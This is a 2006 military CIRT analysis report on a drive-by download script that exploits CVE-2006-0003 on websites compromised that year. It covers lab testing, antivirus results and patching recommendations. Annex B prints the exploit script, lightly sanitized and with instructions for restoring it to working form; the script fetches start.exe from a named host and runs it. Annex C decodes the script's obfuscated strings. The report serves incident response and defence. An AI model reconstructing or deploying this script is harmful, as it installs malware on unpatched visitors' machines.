3380-1 (CFNOC/DND CIRT)

10 May 06

IH&AA Supervisor

ANALYSIS REPORT-
HOSTILE SCRIPT (CVE-2006-0003)

INTRODUCTION

1. (U) Recently it appears that several websites were compromised and a hostile
script inserted into the HTML source; follow-up investigation appears to indicate that
the compromises in question may have occurred sometime in April 2006.

2. (U) In order to determine the nature of the threat and the vulnerability
associated with the hostile code, initial analysis of this threat was conducted in the
author's personal computer laboratory.

AIM

3. (U) The purpose of this report is twofold:

a. to convey information regarding the nature of this threat and the

associated vulnerability; and

b. to demonstrate any activity associated with the threat.

DISCUSSION & ANALYSIS

4. (U) After configuration of the laboratory environment was complete the

internal/external IDS/Sniffer platforms were initialized. The following compromised
websites were then browsed to generate packet captures for the initial visit and a
period of 60 minutes thereafter:

a. creativemods.com (IP address 67.19.206.84);

b. modelmayhem.com (IP address 66.98.170.84);

c. sensuflex.com (IP address 207.217.96.28);

d. topwallpapers.com (IP address 212.85.33.41); and

e. pinupparadise.com (IP address 198.66.213.80);

5. (U) VMWare was utilized to emulate both patched and unpatched Windows
XP/Windows 2000 platforms; the virtual machines were reinitialized after each visit
in order to ensure that the results were unadulterated.

1
6. (U) Whilst loading the compromised webpage, a hostile script embedded in
the page's HTML source (refer to annex B) runs and attempts to install malware
designated "start.exe" from one of the following URIs (the URIs purposely broken to
prevent accidental infection:

a. h t t p://dnv-counter.com/trf/start.exe; or

b. h t t p://us-counter.counter.com/trf/start.exe.

7. (U) In addition to downloading the malware in question, the hostile code also
appears to incorporate a web counter facility; this is conceivably used by the entity
responsible for the malware in order to record the number of compromised hosts.

8. (U) The following patch levels and operating systems were tested in the
course of this investigation; current patches appear to be effective in preventing
exploitation by the hostile script:

a. Windows XP SP2 unpatched - infected;

b. Windows XP SP2 patched to current patch level - no infection noted;

c. Windows 2000 SP 4 unpatched - infected; and

d. Windows 2000 SP 4 patched to current patch level - no infection

noted.

9. (U) Various A/V implementations were utilized in an attempt to identify the

downloader/malware in question; the detect results and the respective A/V
implementations are as follows:

a. McAfee - PWS-JA;

b. Norton - Trojan.Download;

c. Symantec Corporate - Trojan.Anserin, Trojan.Download

c. Avast Home Edition - Win32:Trojano-P; and

d. AVG Free - no detection.

10. (U) The script in question contained several obfuscated strings; obfuscation of
hostile code is a very common technique used to evade detection and hinder
analysis. All of the obfuscated and reconstituted strings found in the hostile script are
demonstrated in annex C.

2
11. (U) One of the reconstituted strings appeared to be a Class ID1 (clasid)
designated "BD96C556-65A3-11D0-983A"; this clasid corresponds to the client-side
RDS.DataSpace2 object.

12. (U) The hostile code appears to specifically address the RDS.DataSpace
object, which is deployed in Windows installations as an MDAC3 component.
Considering this, the script clearly exploits the CVE-2006-0003 vulnerabilityi; the
patches associated with Microsoft Security Bulletin MS06-014ii, issued on 11 April
2006, address this vulnerability.

CONCLUSIONS & RECOMMENDATIONS

13. (U) This exploit is a potential threat to the organization's network assets for
the following reasons:

a. this threat is widely deployed and requires no interaction from the

user beyond visiting a compromised website;

b. the organization's current patch level does not include the patches
associated with the MS06-014 vulnerability.

c. although the current deployment of the organization's A/V suite will

detect the threat automatically, no further action (e.g. deletion/
quarantine) is taken as the default response is "leave alone".

14. (U) As a result of the conclusions reached from the analysis of this threat, the
following recommendations are hereby submitted for consideration:

a. an emergency push to implement the patch associated with the

MS06-014 vulnerability should be performed ASAP; and

b. the default settings should be changed to allow for the quarantine of

potential threats; and

c. given the performance history of the current A/V implementation,

heuristic detection protection should be set at maximum vice the
current default level.

1
A clsid ("Class ID") is a globally unique identifier that serves to identify a COM ("Component Object
Module") class object; COM is a Microsoft platform for software componentry that enables interprocess
communication and dynamic object creation in any programming language that supports the technology.

2
RDS (Remote Data Services) is a set of programming interfaces from Microsoft that enables users to
update data on the Internet or intranets from their ActiveX-enabled browser.

3
MDAC (Microsoft Data Access Components) is a package of database drivers from Microsoft used for
connecting client PCs to databases in servers.

3
15. (U) Any questions regarding this report may be addressed to the
undersigned.

//signed//

E.L. Mac Daibhidh, CD

Cpl
Special Operations Analyst
DND CIRT IH&AA Team
Special Operations Cell
945-7747

Attachments:

Annexes A-C

4
Annex A - Laboratory Configuration

(U) The laboratory configuration utilized for the analysis associated with this
report is demonstrated in the diagram below; the "Victim" host uses VMWare to emulate
patched/unpatched versions of Windows XP Pro and Windows 2000.

Internet

Receive-Only
CAT5
Hub External IDS/Sniffer

Router

Receive-Only
CAT5
Hub Internal IDS/Sniffer

Victim

5
Annex B - Hostile Script

The sanitized version of the hostile script in question may be found below; should
it be necessary to restore the script's functionality for lab purposes, simply delete all the
[DELETE THIS] strings.

<script>
function f[DELETE THIS](b, a, c) { return a + b + c; }
function g[DELETE THIS](b, a) { return a + b; }
var s[DELETE THIS] = new Array
(
"",
"start.[DELETE THIS]exe",
"http://[DELETE THIS]dnv-counter.com/trf/blank.html",
"object[DELETE THIS]",
"classid[DELETE THIS]",
f[DELETE THIS]("0C0", g(f(g("3-11D0-9", "56-65A"), "id:BD96C5", "83A-0"), "cls"),
g("9E36", "4FC2")),
g[DELETE THIS](f("ft.XMLH", "oso", "TTP"), "Micr"),
f[DELETE THIS]("E", "G", "T"),
f[DELETE THIS](g(".Str", "odb"), "Ad", "eam"),
f[DELETE THIS](g(".She", "ipt"), "WScr", "ll"),
"[DELETE THIS]PROCESS",
"[DELETE THIS]TMP",
"[DELETE THIS]/[^/]*$",
"[DELETE THIS]/",
"[DELETE THIS]\\"
);
a = [DELETE THIS]document.createElement(s[3]);
a.setAttribute[DELETE THIS](s[4], s[5]);
with[DELETE THIS](a.CreateObject(s[6], s[0]))
{
open[DELETE THIS](s[7], location.href.replace(new RegExp[DELETE THIS](s[12]),
s[13] + s[1]), false);
send[DELETE THIS]();
if[DELETE THIS](status < 400)
with[DELETE THIS](a.CreateObject(s[8], s[0]))
{
Type[DELETE THIS] = 1;
Open[DELETE THIS]();
Write[DELETE THIS](responseBody);
with[DELETE THIS](a.CreateObject(s[9], s[0]))
{
c[DELETE THIS] = Environment[DELETE THIS](s[10])(s[11]) + s[14] + s[1];
SaveToFile[DELETE THIS](c, 2);
Exec[DELETE THIS](c);
}
}
}
location.replace[DELETE THIS](s[2]);
// -->
</script>
</html>

6
<!-- Start of [DELETE THIS]StatCounter Code -->
<script type="text/[DELETE THIS]javascript" language[DELETE THIS]="[DELETE
THIS]javascript">
var sc_project[DELETE THIS]=1504492;
var sc_invisible[DELETE THIS]=1;
var sc_partition[DELETE THIS]=13;
var sc_security=[DELETE THIS]"f5ae647d";
</script>

<script type="text/javascript" language="javascript" src="http://www.[DELETE

THIS]statcounter.[DELETE THIS]com/counter/[DELETE
THIS]counter.js"></script><noscript><a href="http://www.[DELETE
THIS]statcounter.[DELETE THIS]com/" target="_blank"><img src="http://[DELETE
THIS]c14.statcounter.[DELETE THIS]com/counter.[DELETE
THIS]php?sc_project=[DELETE THIS]1504492&amp;java=0&amp;security=[DELETE
THIS]f5ae647d&amp;invisible=1" alt="[DELETE THIS]simple hit counter"
border="0"></a> </noscript>
<!-- End of StatCounter Code -->

7
Annex C -

Several obfuscated strings were noted in the script; the strings, both obfuscated
and reconstituted, are demonstrated below.

g(f("ft.XMLH", "oso", "TTP"), "Micr")

Microsoft.XMLHTTP

f("E", "G", "T")

GET

f(g(".Str", "odb"), "Ad", "eam")

Adodb.Stream

f(g(".She", "ipt"), "WScr", "ll")

Wscript.Shell

f("0C0", g(f(g("3-11D0-9", "56-65A"), "id:BD96C5", "83A-0"), "cls"), g("9E36", "4FC2"))

clsid:BD96C556-65A3-11D0-983A-04FC20C09E36

8
References:
i

Common Vulnerabilities and Exposures. "CVE-2006-0003". Online document. Apr 11, 2006.
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003.
ii

Microsoft Technet. "Microsoft Security Bulletin MS06-014". Online document. Apr 11, 2006
http://securityresponse.symantec.com/avcenter/reference/blended.attacks.pdf.